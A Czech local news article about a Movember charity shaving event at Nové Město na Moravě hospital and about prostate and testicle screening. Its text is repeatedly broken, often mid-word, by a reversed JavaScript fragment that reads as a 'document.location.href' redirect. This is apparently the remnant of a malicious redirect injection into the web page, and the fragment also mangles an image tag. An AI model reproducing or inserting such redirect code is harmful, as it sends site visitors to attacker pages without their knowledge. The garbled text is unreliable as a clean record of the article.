Rainbow page separator

Novoměstská nemocnice uspořádá charitativní skupinové holení

Pátek, 2. listopadu 2018

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / His[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toricky první Movember charitativní skupinové holení připravuje na 28. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu v době od 12 do 16 hodin novoměstská nemocnice. Recepce chirurgie se promění v improvizované holičství.
„Akci podporuje Střední škola obchodní a služeb SČMSD ve Žďáře nad Sázavou. Studenti oboru kadeřník budou muže holit pro dobrou věc. Dobrovolný příspěvek za službu pošleme nadačnímu fondu Muži proti rakovině. Muži tak přispějí hlavně sobě,“ uvedla mluvčí novoměstské nemocnice Tamara Pecková. „Abychom měli vůbec koho holit, poprosili jsme o spolupráci spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní oddíly ze Žďáru a z Nového Města. Vousáče slíbili dodat žďárští hokejisté a novoměstští fotbalisté a ragbisté,“ dodala mluvčí s tím, že i mezi nemocničními lékaři se našli „pánové na holení“. „Skoro povinné [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mají naši urologové, ale zapojí se i lékaři z jiných oddělení, například z pa[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologie,“ doplnila mluvčí.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave.jpg“ alt=““ width=“201″ height=“105″>Připojením se k charitativnímu projektu Movember chtějí lékaři novoměstské urologie upozornit na důleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost preventivního vyšetření prostaty a varlat. „Vyšetření je v naší ambulanci prováděno novým špičkovým ultrazvukovým přístrojem a k dispozici máme i moderní labora[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torní diagnostiku nádorů prostaty z odběru krve. Vyšetření prostaty je vhodné u mužů starších 50 let, kteří nebyli během posledních dvou let vyšetřeni. Na prevenci by určitě měli myslet i muži nad 45 let v případě, že byl jejich blízkému příbuznému diagnostikován karcinom prostaty. Vyšetření varlat není věkově limi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továno,“ přiblížil lékař urologického oddělení Jiří Janů.